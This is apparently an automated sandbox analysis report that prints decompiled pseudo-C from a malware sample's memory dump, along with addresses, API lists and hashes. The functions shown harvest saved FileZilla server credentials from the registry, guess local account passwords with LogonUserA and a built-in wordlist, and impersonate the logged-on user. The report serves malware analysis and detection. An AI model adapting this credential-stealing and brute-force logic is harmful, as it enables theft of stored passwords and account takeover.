                                                                                                                                        Function 0BC0341E, Relevance: 1.6, APIs: 1, Instructions: 316memoryCOMMONCrypto
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                        			E0BC0341E(signed int* _a4, intOrPtr _a8, intOrPtr _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v24;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _v60;
				signed int _v64;
				intOrPtr _v68;
				char _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr* _v88;
				void* __edi;
				void* __esi;
				signed int _t103;
				signed int _t104;
				signed char _t106;
				signed int _t109;
				signed int _t110;
				unsigned int _t125;
				signed int _t128;
				void* _t131;
				intOrPtr* _t133;
				intOrPtr* _t137;
				intOrPtr _t138;
				signed int _t140;
				signed int _t142;
				signed int _t150;
				signed short _t152;
				signed int _t153;
				signed int _t154;
				signed int _t157;
				intOrPtr _t159;
				signed int _t165;
				signed int _t168;
				void* _t171;
				signed int* _t174;
				void* _t177;
				unsigned int _t179;
				signed int _t203;
				unsigned int _t206;
				intOrPtr _t207;
				void* _t210;
				signed int _t215;
				void* _t217;
				void* _t218;
				void* _t219;
				intOrPtr _t221;
				signed int _t222;
				signed int* _t223;
				signed int _t225;
				void* _t227;
				void* _t228;

				_t227 = (_t225 & 0xfffffff8) - 0x2c;
				_t221 = _a12;
				_t215 = 0;
				if(_t221 != 0) {
					_t103 =  *0xbc10d0c; // 0x800
					_t174 = _a4;
					_t222 = _t221 - 1;
					_t104 = _t103 * _t222;
					_v24 = _t104;
					 *((intOrPtr*)( *_t174 + 0x14))(_t174, _t104, 0, 0, 0);
					__eflags = _t222;
					if(_t222 == 0) {
						_t171 = 0x64;
						__eflags = 0;
						 *((intOrPtr*)( *_t174 + 0x14))(_t174, _t171, 0, 1, 0);
					}
					_t223 = _a16;
					_t106 = E0BC08BBA(_t223, _t174);
					_pop(_t177);
					_v52 = _t106 & 0x000000ff;
					__eflags =  *_t223 - _t215;
					if(__eflags == 0) {
						L9:
						_v48 = _t215;
						goto L10;
					} else {
						_push( &_v64);
						_t219 = 2;
						_t165 = E0BC08A0D(_t174, _t177, _t219, __eflags);
						_pop(_t177);
						 *_t223 = _t165;
						__eflags = _t165;
						if(__eflags == 0) {
							L8:
							_t215 = 0;
							__eflags = 0;
							goto L9;
						}
						_t168 = E0BC08A0D(_t174, _t177, _t219, __eflags,  &_v64);
						_pop(_t177);
						 *_t223 = _t168;
						__eflags = _t168;
						if(_t168 == 0) {
							goto L8;
						}
						asm("rol ax, 0x8");
						_v48 = _v64 & 0x0000ffff;
						_t215 = 0;
						L10:
						__eflags =  *_t223 - _t215;
						if(__eflags != 0) {
							_push( &_v64);
							_t218 = 2;
							 *_t223 = E0BC08A0D(_t174, _t177, _t218, __eflags);
							_t215 = 0;
							__eflags = 0;
						}
						E0BC08BBA(_t223, _t174);
						__eflags =  *_t223 - _t215;
						if( *_t223 == _t215) {
							L27:
							_t109 = 0;
							__eflags = 0;
							L28:
							return _t109;
						} else {
							__eflags = _v52 - 0xd;
							if(_v52 == 0xd) {
								L15:
								_t110 = _v48 & 0x0000ffff;
								_t179 =  *0xbc10d0c; // 0x800
								_t180 = _t179 >> 1;
								_v56 = _t110;
								__eflags = _t110 - _t179 >> 1;
								if(_t110 > _t179 >> 1) {
									goto L27;
								}
								__eflags = _v52 - 5;
								if(_v52 == 5) {
									_t159 = E0BC08B76(_t223, _t174);
									_pop(_t180);
									_v40 = _t159;
								}
								_v60 = LocalAlloc(0x40, 0x10080);
								_v48 = _t215;
								__eflags = _v56 - _t215;
								if(_v56 <= _t215) {
									L25:
									__eflags =  *_t223 - _t215;
									if( *_t223 != _t215) {
										__eflags = _v52 - 5;
										if(_v52 != 5) {
											__eflags = _v52 - 0xd;
											if(_v52 != 0xd) {
												L51:
												E0BC08D3D(_v60); // executed
												goto L1;
											}
											_v52 = _t215;
											__eflags = _v56 - _t215;
											if(_v56 <= _t215) {
												goto L51;
											} else {
												goto L38;
											}
											while(1) {
												L38:
												_t203 =  *_t174;
												 *((intOrPtr*)(_t203 + 0x14))(_t174,  *((intOrPtr*)(_v60 + _v52 * 4)) + _v44, 0, _t215, _t215);
												_v52 = E0BC02F2F(_t223, _t174, _t215);
												__eflags =  *_t223 - _t215;
												if( *_t223 == _t215) {
													goto L26;
												}
												__eflags = _t203;
												if(_t203 != 0) {
													goto L51;
												}
												E0BC02F2F(_t223, _t174, _t215);
												__eflags =  *_t223 - _t215;
												if( *_t223 == _t215) {
													goto L26;
												}
												_t125 =  *0xbc10d0c; // 0x800
												_t128 = (_t125 + 0xfffffff4 << 5) / 0xff;
												_t206 =  *0xbc10d0c; // 0x800
												_t207 = _t206 + 0xffffffdd;
												_v68 = _t207;
												_t69 = _t128 - 0x17; // 0x6f5
												_t190 = _t69;
												_t129 = _v52;
												_v60 = _t190;
												__eflags = _t129 - _t207;
												if(_t129 > _t207) {
													_t140 = _t129 - _t190;
													_t72 = _t207 + 0x1f; // 0x742
													_t190 = _t72;
													_t129 = _v60;
													_t210 = _v60 + _t140 % _t72;
													__eflags = _v68 - _t210;
													if(_v68 >= _t210) {
														_t129 = _t210;
													}
												}
												_t131 = E0BC02FB8(_t223, _t190, _t174, _t129, _v52);
												_t228 = _t227 + 0xc;
												_v60 = _t131;
												__eflags = _t131 - _t215;
												if(_t131 == _t215) {
													goto L26;
												} else {
													_v68 = E0BC03294( &_v84, _t131,  &_v84,  &_v56);
													_t133 = _v60;
													_t227 = _t228 + 0xc;
													 *((intOrPtr*)( *_t133 + 8))(_t133);
													__eflags = _v72 - _t215;
													if(_v72 == _t215) {
														L50:
														_v76 = _v76 + 1;
														__eflags = _v76 - _v80;
														if(_v76 < _v80) {
															continue;
														}
														goto L51;
													}
													__eflags = _v88 - _t215;
													if(_v88 == _t215) {
														goto L50;
													}
													_a24(_t174, _a8, _v88, _v60, _a20);
													_t137 = _v88;
													_t227 = _t227 + 0x14;
													_v72 = _t137;
													while(1) {
														_t138 =  *_t137;
														__eflags = _t138 - _t215;
														if(_t138 == _t215) {
															goto L50;
														}
														E0BC08D3D(_t138);
														_t95 =  &_v72;
														 *_t95 = _v72 + 4;
														__eflags =  *_t95;
														_t137 = _v72;
													}
													goto L50;
												}
											}
											goto L26;
										}
										_v52 = _t215;
										__eflags = _v56 - _t215;
										if(_v56 <= _t215) {
											L34:
											_t142 = E0BC0341E(_t174, _a8, _v40, _t223, _a20, _a24); // executed
											__eflags = _t142;
											if(_t142 != 0) {
												goto L51;
											}
											goto L26;
										} else {
											goto L31;
										}
										while(1) {
											L31:
											 *((intOrPtr*)( *_t174 + 0x14))(_t174,  *((intOrPtr*)(_v60 + _v52 * 4)) + _v44, 0, _t215, _t215);
											_v68 = E0BC08B76(_t223, _t174);
											E0BC02F2F(_t223, _t174, _t215);
											__eflags =  *_t223 - _t215;
											if( *_t223 == _t215) {
												goto L26;
											}
											_t150 = E0BC0341E(_t174, _a8, _v68, _t223, _a20, _a24); // executed
											_t227 = _t227 + 0x18;
											__eflags = _t150;
											if(_t150 == 0) {
												goto L26;
											}
											_v72 = _v72 + 1;
											__eflags = _v72 - _v76;
											if(_v72 < _v76) {
												continue;
											}
											goto L34;
										}
									}
									L26:
									E0BC08D3D(_v80);
									goto L27;
								} else {
									do {
										__eflags =  *_t223 - _t215;
										if(__eflags == 0) {
											L23:
											_t152 = 0;
											__eflags = 0;
											goto L24;
										}
										_push( &_v64);
										_t217 = 2;
										_t157 = E0BC08A0D(_t174, _t180, _t217, __eflags);
										 *_t223 = _t157;
										__eflags = _t157;
										if(_t157 == 0) {
											_t215 = 0;
											__eflags = 0;
											goto L23;
										}
										asm("rol ax, 0x8");
										_t152 = _v64 & 0x0000ffff;
										_t215 = 0;
										L24:
										_t180 = _t152 & 0x0000ffff;
										_t153 = _v48;
										 *(_v60 + _t153 * 4) = _t152 & 0x0000ffff;
										_t154 = _t153 + 1;
										_v48 = _t154;
										__eflags = _t154 - _v56;
									} while (_t154 < _v56);
									goto L25;
								}
							}
							__eflags = _v52 - 5;
							if(_v52 != 5) {
								goto L27;
							}
							goto L15;
						}
					}
				}
				L1:
				_t109 = 1;
				goto L28;
			}


























































                                                                                                                                        0x0bc03424
                                                                                                                                        0x0bc03429
                                                                                                                                        0x0bc0342d
                                                                                                                                        0x0bc03431
                                                                                                                                        0x0bc0343b
                                                                                                                                        0x0bc03440
                                                                                                                                        0x0bc03445
                                                                                                                                        0x0bc03446
                                                                                                                                        0x0bc0344e
                                                                                                                                        0x0bc03452
                                                                                                                                        0x0bc03455
                                                                                                                                        0x0bc03457
                                                                                                                                        0x0bc0345d
                                                                                                                                        0x0bc03461
                                                                                                                                        0x0bc03466
                                                                                                                                        0x0bc03466
                                                                                                                                        0x0bc03469
                                                                                                                                        0x0bc0346d
                                                                                                                                        0x0bc03475
                                                                                                                                        0x0bc03476
                                                                                                                                        0x0bc0347a
                                                                                                                                        0x0bc0347c
                                                                                                                                        0x0bc034bd
                                                                                                                                        0x0bc034bd
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0347e
                                                                                                                                        0x0bc03482
                                                                                                                                        0x0bc03485
                                                                                                                                        0x0bc03488
                                                                                                                                        0x0bc0348d
                                                                                                                                        0x0bc0348e
                                                                                                                                        0x0bc03490
                                                                                                                                        0x0bc03492
                                                                                                                                        0x0bc034bb
                                                                                                                                        0x0bc034bb
                                                                                                                                        0x0bc034bb
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc034bb
                                                                                                                                        0x0bc0349b
                                                                                                                                        0x0bc034a0
                                                                                                                                        0x0bc034a1
                                                                                                                                        0x0bc034a3
                                                                                                                                        0x0bc034a5
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc034ac
                                                                                                                                        0x0bc034b3
                                                                                                                                        0x0bc034b7
                                                                                                                                        0x0bc034c1
                                                                                                                                        0x0bc034c1
                                                                                                                                        0x0bc034c3
                                                                                                                                        0x0bc034c9
                                                                                                                                        0x0bc034cc
                                                                                                                                        0x0bc034d5
                                                                                                                                        0x0bc034d7
                                                                                                                                        0x0bc034d7
                                                                                                                                        0x0bc034d7
                                                                                                                                        0x0bc034da
                                                                                                                                        0x0bc034e0
                                                                                                                                        0x0bc034e2
                                                                                                                                        0x0bc03595
                                                                                                                                        0x0bc03595
                                                                                                                                        0x0bc03595
                                                                                                                                        0x0bc03597
                                                                                                                                        0x0bc0359d
                                                                                                                                        0x0bc034e8
                                                                                                                                        0x0bc034e8
                                                                                                                                        0x0bc034ed
                                                                                                                                        0x0bc034fa
                                                                                                                                        0x0bc034fa
                                                                                                                                        0x0bc034ff
                                                                                                                                        0x0bc03505
                                                                                                                                        0x0bc03507
                                                                                                                                        0x0bc0350b
                                                                                                                                        0x0bc0350d
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03513
                                                                                                                                        0x0bc03518
                                                                                                                                        0x0bc0351b
                                                                                                                                        0x0bc03520
                                                                                                                                        0x0bc03521
                                                                                                                                        0x0bc03521
                                                                                                                                        0x0bc03532
                                                                                                                                        0x0bc03536
                                                                                                                                        0x0bc0353a
                                                                                                                                        0x0bc0353e
                                                                                                                                        0x0bc03587
                                                                                                                                        0x0bc03587
                                                                                                                                        0x0bc03589
                                                                                                                                        0x0bc0359e
                                                                                                                                        0x0bc035a3
                                                                                                                                        0x0bc03635
                                                                                                                                        0x0bc0363a
                                                                                                                                        0x0bc03777
                                                                                                                                        0x0bc0377b
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03780
                                                                                                                                        0x0bc03640
                                                                                                                                        0x0bc03644
                                                                                                                                        0x0bc03648
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0364e
                                                                                                                                        0x0bc0364e
                                                                                                                                        0x0bc0365d
                                                                                                                                        0x0bc03666
                                                                                                                                        0x0bc03674
                                                                                                                                        0x0bc03678
                                                                                                                                        0x0bc0367a
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03685
                                                                                                                                        0x0bc03687
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03691
                                                                                                                                        0x0bc03698
                                                                                                                                        0x0bc0369a
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc036a0
                                                                                                                                        0x0bc036b2
                                                                                                                                        0x0bc036b4
                                                                                                                                        0x0bc036ba
                                                                                                                                        0x0bc036bd
                                                                                                                                        0x0bc036c1
                                                                                                                                        0x0bc036c1
                                                                                                                                        0x0bc036c4
                                                                                                                                        0x0bc036c8
                                                                                                                                        0x0bc036cc
                                                                                                                                        0x0bc036ce
                                                                                                                                        0x0bc036d0
                                                                                                                                        0x0bc036d2
                                                                                                                                        0x0bc036d2
                                                                                                                                        0x0bc036d9
                                                                                                                                        0x0bc036dd
                                                                                                                                        0x0bc036df
                                                                                                                                        0x0bc036e3
                                                                                                                                        0x0bc036e5
                                                                                                                                        0x0bc036e5
                                                                                                                                        0x0bc036e3
                                                                                                                                        0x0bc036ef
                                                                                                                                        0x0bc036f4
                                                                                                                                        0x0bc036f7
                                                                                                                                        0x0bc036fb
                                                                                                                                        0x0bc036fd
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03703
                                                                                                                                        0x0bc03713
                                                                                                                                        0x0bc03717
                                                                                                                                        0x0bc0371d
                                                                                                                                        0x0bc03721
                                                                                                                                        0x0bc03724
                                                                                                                                        0x0bc03728
                                                                                                                                        0x0bc03765
                                                                                                                                        0x0bc03765
                                                                                                                                        0x0bc0376d
                                                                                                                                        0x0bc03771
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03771
                                                                                                                                        0x0bc0372a
                                                                                                                                        0x0bc0372e
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0373f
                                                                                                                                        0x0bc03742
                                                                                                                                        0x0bc03746
                                                                                                                                        0x0bc03749
                                                                                                                                        0x0bc0375f
                                                                                                                                        0x0bc0375f
                                                                                                                                        0x0bc03761
                                                                                                                                        0x0bc03763
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03750
                                                                                                                                        0x0bc03755
                                                                                                                                        0x0bc03755
                                                                                                                                        0x0bc03755
                                                                                                                                        0x0bc0375a
                                                                                                                                        0x0bc0375e
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0375f
                                                                                                                                        0x0bc036fd
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0364e
                                                                                                                                        0x0bc035a9
                                                                                                                                        0x0bc035ad
                                                                                                                                        0x0bc035b1
                                                                                                                                        0x0bc03611
                                                                                                                                        0x0bc03620
                                                                                                                                        0x0bc03628
                                                                                                                                        0x0bc0362a
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc035b3
                                                                                                                                        0x0bc035b3
                                                                                                                                        0x0bc035cb
                                                                                                                                        0x0bc035d5
                                                                                                                                        0x0bc035dd
                                                                                                                                        0x0bc035e4
                                                                                                                                        0x0bc035e6
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc035f7
                                                                                                                                        0x0bc035fc
                                                                                                                                        0x0bc035ff
                                                                                                                                        0x0bc03601
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03603
                                                                                                                                        0x0bc0360b
                                                                                                                                        0x0bc0360f
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0360f
                                                                                                                                        0x0bc035b3
                                                                                                                                        0x0bc0358b
                                                                                                                                        0x0bc0358f
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03540
                                                                                                                                        0x0bc03540
                                                                                                                                        0x0bc03540
                                                                                                                                        0x0bc03542
                                                                                                                                        0x0bc0356c
                                                                                                                                        0x0bc0356c
                                                                                                                                        0x0bc0356c
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0356c
                                                                                                                                        0x0bc03548
                                                                                                                                        0x0bc0354b
                                                                                                                                        0x0bc0354e
                                                                                                                                        0x0bc03554
                                                                                                                                        0x0bc03556
                                                                                                                                        0x0bc03558
                                                                                                                                        0x0bc0356a
                                                                                                                                        0x0bc0356a
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0356a
                                                                                                                                        0x0bc0355f
                                                                                                                                        0x0bc03563
                                                                                                                                        0x0bc03566
                                                                                                                                        0x0bc0356e
                                                                                                                                        0x0bc03572
                                                                                                                                        0x0bc03575
                                                                                                                                        0x0bc03579
                                                                                                                                        0x0bc0357c
                                                                                                                                        0x0bc0357d
                                                                                                                                        0x0bc03581
                                                                                                                                        0x0bc03581
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03540
                                                                                                                                        0x0bc0353e
                                                                                                                                        0x0bc034ef
                                                                                                                                        0x0bc034f4
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc034f4
                                                                                                                                        0x0bc034e2
                                                                                                                                        0x0bc0347c
                                                                                                                                        0x0bc03433
                                                                                                                                        0x0bc03435
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00010080), ref: 0BC0352C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocLocal
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3494564517-0
                                                                                                                                        • Opcode ID: 4be3c8129afaf623c42ebd7ccbd19f1a4d54bae3a7edc2e19b13a45f7a79b48f
                                                                                                                                        • Instruction ID: 5c5d46b2e8aaa4be49d732247d359f996236395be9753634c05ef2bd8d8701cb
                                                                                                                                        • Opcode Fuzzy Hash: 4be3c8129afaf623c42ebd7ccbd19f1a4d54bae3a7edc2e19b13a45f7a79b48f
                                                                                                                                        • Instruction Fuzzy Hash: 97B17CB15283819FC715DF69C84582BBBE9FBCC610F104A2EF895D6290EB30DA85CB56
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Function 0BC023A1, Relevance: 38.6, APIs: 3, Strings: 19, Instructions: 104registryUNIQUE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                        			E0BC023A1(void* __ecx, void* __edx, intOrPtr _a4, char* _a8) {
				signed int _v8;
				char _v2056;
				intOrPtr _v2060;
				void* _v2064;
				char _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				long _t34;
				char* _t46;
				void* _t51;
				signed int _t54;
				void* _t55;
				void* _t57;

				_t51 = __edx;
				_t24 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t24 ^ _t54;
				_t46 = _a8;
				_t52 = 0xbeef0013;
				_v2072 = _a4;
				_v2060 = 0;
				E0BC0254B(_t46, __ecx, _a4, "Pass", "Host", "User", "Port", "Remote Dir", "Server Type", 0xbeef0013); // executed
				E0BC0254B(_t46, __ecx, _v2072, "Server.Pass", "Server.Host", "Server.User", "Server.Port", "Path", "ServerType", 0xbeef0013); // executed
				E0BC0254B(_t46, __ecx, _v2072, "Last Server Pass", "Last Server Host", "Last Server User", "Last Server Port", "Last Server Path", "Last Server Type", 0xbeef0014); // executed
				_t57 = _t55 + 0x60;
				_t34 = RegOpenKeyA(0x80000001, _t46,  &_v2064); // executed
				if(_t34 == 0) {
					_t52 = RegEnumKeyExA;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v2068);
					_push( &_v2056);
					_push(0);
					while(1) {
						_v2068 = 0x7ff;
						if(RegEnumKeyExA(_v2064, ??, ??, ??, ??, ??, ??, ??) != 0) {
							break;
						}
						_v2076 = E0BC08F32(E0BC08EE2("\\", _t46),  &_v2056);
						E0BC023A1( &_v2056, _t51, _v2072, _t41);
						E0BC08D3D(_v2076);
						_t57 = _t57 + 0x18;
						_v2060 = _v2060 + 1;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v2068);
						_push( &_v2056);
						_push(_v2060);
					}
					_t34 = RegCloseKey(_v2064);
				}
				return E0BC09FDC(_t34, _t46, _v8 ^ _t54, _t51, _t52, 0);
			}




















                                                                                                                                        0x0bc023a1
                                                                                                                                        0x0bc023aa
                                                                                                                                        0x0bc023b1
                                                                                                                                        0x0bc023b8
                                                                                                                                        0x0bc023bd
                                                                                                                                        0x0bc023e1
                                                                                                                                        0x0bc023ec
                                                                                                                                        0x0bc023f2
                                                                                                                                        0x0bc0241e
                                                                                                                                        0x0bc02451
                                                                                                                                        0x0bc02456
                                                                                                                                        0x0bc02466
                                                                                                                                        0x0bc0246e
                                                                                                                                        0x0bc02474
                                                                                                                                        0x0bc0247a
                                                                                                                                        0x0bc0247b
                                                                                                                                        0x0bc0247c
                                                                                                                                        0x0bc0247d
                                                                                                                                        0x0bc02484
                                                                                                                                        0x0bc0248b
                                                                                                                                        0x0bc0248c
                                                                                                                                        0x0bc024e5
                                                                                                                                        0x0bc024eb
                                                                                                                                        0x0bc024f9
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc024ae
                                                                                                                                        0x0bc024b4
                                                                                                                                        0x0bc024bf
                                                                                                                                        0x0bc024c4
                                                                                                                                        0x0bc024c7
                                                                                                                                        0x0bc024cd
                                                                                                                                        0x0bc024ce
                                                                                                                                        0x0bc024cf
                                                                                                                                        0x0bc024d0
                                                                                                                                        0x0bc024d7
                                                                                                                                        0x0bc024de
                                                                                                                                        0x0bc024df
                                                                                                                                        0x0bc024df
                                                                                                                                        0x0bc02501
                                                                                                                                        0x0bc02501
                                                                                                                                        0x0bc02515

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0BC02466
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC024F5
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0BC02501
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                                        • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$Software\FileZilla$User
                                                                                                                                        • API String ID: 1332880857-2750396267
                                                                                                                                        • Opcode ID: 6e82eef031ab727920e6c89faff818f1ac65400b375b374f6fa9e17d18383350
                                                                                                                                        • Instruction ID: 359ea5f23a02120bb8691b66cbeb2fc00e870cf4ae09b301c8a4e3e60d365098
                                                                                                                                        • Opcode Fuzzy Hash: 6e82eef031ab727920e6c89faff818f1ac65400b375b374f6fa9e17d18383350
                                                                                                                                        • Instruction Fuzzy Hash: 62317875A75218BADB109F998C46EDBBAFCFF04704F00C1B4B94AA2180DD709A849FF0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC015D2, Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 140stringCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 113 bc015d2-bc015e7 114 bc015e9-bc01624 113->114 115 bc01627-bc0163b call bc09b51 114->115 118 bc0163d-bc01644 115->118 119 bc01646-bc01652 lstrcmpiA 118->119 120 bc01658-bc0166f LogonUserA 118->120 119->120 121 bc01789-bc0178d 119->121 122 bc01704-bc01733 LoadUserProfileA 120->122 123 bc01675-bc016a4 call bc091e5 lstrlenA LCMapStringA 120->123 121->114 124 bc01793-bc01797 121->124 125 bc01735-bc0173a 122->125 126 bc0174a 122->126 134 bc016a6-bc016bb LogonUserA 123->134 135 bc016c8-bc016d1 call bc08d3d 123->135 128 bc01741-bc01748 125->128 129 bc0173c 125->129 130 bc0174d-bc01758 ImpersonateLoggedOnUser 126->130 128->130 129->128 132 bc0175a call bc01153 130->132 133 bc0176f-bc01772 130->133 141 bc0175f-bc01765 RevertToSelf 132->141 138 bc01780-bc01783 CloseHandle 133->138 139 bc01774-bc0177a UnloadUserProfile 133->139 134->135 137 bc016bd-bc016c6 call bc08d3d 134->137 145 bc016d4-bc016ec LogonUserA 135->145 137->122 138->121 139->138 141->133 145->122 146 bc016ee-bc016f9 145->146 146->145 147 bc016fb-bc016fe 146->147 147->121 147->122
                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                        			E0BC015D2(void* __edx) {
				void* _v8;
				CHAR* _v12;
				CHAR* _v16;
				CHAR* _v20;
				CHAR* _v24;
				CHAR* _v28;
				CHAR* _v32;
				CHAR* _v40;
				CHAR* _v44;
				char _v48;
				CHAR* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				CHAR* _t63;
				int _t65;
				char* _t67;
				int _t69;
				intOrPtr _t72;
				int _t80;
				void* _t88;
				intOrPtr* _t90;
				void* _t91;

				_t88 = __edx;
				_t90 =  *0xbc10d08; // 0x325a4b0
				do {
					_v84 = "SeImpersonatePrivilege";
					_v80 = "SeTcbPrivilege";
					_v76 = "SeChangeNotifyPrivilege";
					_v72 = "SeCreateTokenPrivilege";
					_v68 = "SeBackupPrivilege";
					_v64 = "SeRestorePrivilege";
					_v60 = "SeIncreaseQuotaPrivilege";
					_v56 = "SeAssignPrimaryTokenPrivilege";
					_v52 = 0;
					_v12 = 0;
					do {
						E0BC09B51( *((intOrPtr*)(_t91 + _v12 * 4 - 0x50))); // executed
						_v12 =  &(_v12[1]);
					} while (_v12 < 9);
					_t63 =  *0xbc10d04; // 0x3206648
					if(_t63 == 0) {
						L5:
						_v8 = 0;
						_t65 = LogonUserA( *(_t90 + 4), 0,  *(_t90 + 4), 2, 0,  &_v8);
						_v16 = _t65;
						if(_t65 != 0) {
							L13:
							_v48 = 0x20;
							_v44 = 1;
							_v40 =  *(_t90 + 4);
							_t67 =  &_v48;
							_v32 = 0;
							_v28 = 0;
							_v24 = 0;
							_v20 = 0;
							__imp__LoadUserProfileA(_v8, _t67);
							if(_t67 == 0) {
								_v16 = 0;
							} else {
								_t72 = _v20;
								if(_t72 != 0) {
									 *0xbc10010 = _t72;
								}
								_v16 = 1;
							}
							if(ImpersonateLoggedOnUser(_v8) != 0) {
								E0BC01153(_t88);
								RevertToSelf();
								 *0xbc10010 = 0x80000001;
							}
							if(_v16 != 0) {
								__imp__UnloadUserProfile(_v8, _v20);
							}
							_t69 = CloseHandle(_v8);
						} else {
							_v12 = E0BC091E5( *(_t90 + 4));
							if(LCMapStringA(0x400, 0x100,  *(_t90 + 4), lstrlenA( *(_t90 + 4)), _v12, _t74) == 0) {
								L9:
								E0BC08D3D(_v12);
								_v12 = 0;
								while(1) {
									_t37 =  &(_v12[0xbc10100]); // 0x500bc0d3
									_t69 = LogonUserA( *(_t90 + 4), 0,  *_t37, 2, 0,  &_v8);
									if(_t69 != 0) {
										goto L13;
									}
									_v12 =  &(_v12[4]);
									if(_v12 < 0x7d0) {
										continue;
									} else {
										if(_v16 != 0) {
											goto L13;
										}
									}
									goto L23;
								}
								goto L13;
							} else {
								_t80 = LogonUserA( *(_t90 + 4), 0, _v12, 2, 0,  &_v8);
								_v16 = _t80;
								if(_t80 == 0) {
									goto L9;
								} else {
									E0BC08D3D(_v12);
									goto L13;
								}
							}
						}
					} else {
						_t69 = lstrcmpiA(_t63,  *(_t90 + 4));
						if(_t69 != 0) {
							goto L5;
						}
					}
					L23:
					_t90 =  *_t90;
				} while ( *_t90 != 0);
				return _t69;
			}































                                                                                                                                        0x0bc015d2
                                                                                                                                        0x0bc015e0
                                                                                                                                        0x0bc015e9
                                                                                                                                        0x0bc015e9
                                                                                                                                        0x0bc015f0
                                                                                                                                        0x0bc015f7
                                                                                                                                        0x0bc015fe
                                                                                                                                        0x0bc01605
                                                                                                                                        0x0bc0160c
                                                                                                                                        0x0bc01613
                                                                                                                                        0x0bc0161a
                                                                                                                                        0x0bc01621
                                                                                                                                        0x0bc01624
                                                                                                                                        0x0bc01627
                                                                                                                                        0x0bc0162e
                                                                                                                                        0x0bc01633
                                                                                                                                        0x0bc0163a
                                                                                                                                        0x0bc0163d
                                                                                                                                        0x0bc01644
                                                                                                                                        0x0bc01658
                                                                                                                                        0x0bc0165f
                                                                                                                                        0x0bc01668
                                                                                                                                        0x0bc0166a
                                                                                                                                        0x0bc0166f
                                                                                                                                        0x0bc01704
                                                                                                                                        0x0bc01704
                                                                                                                                        0x0bc0170b
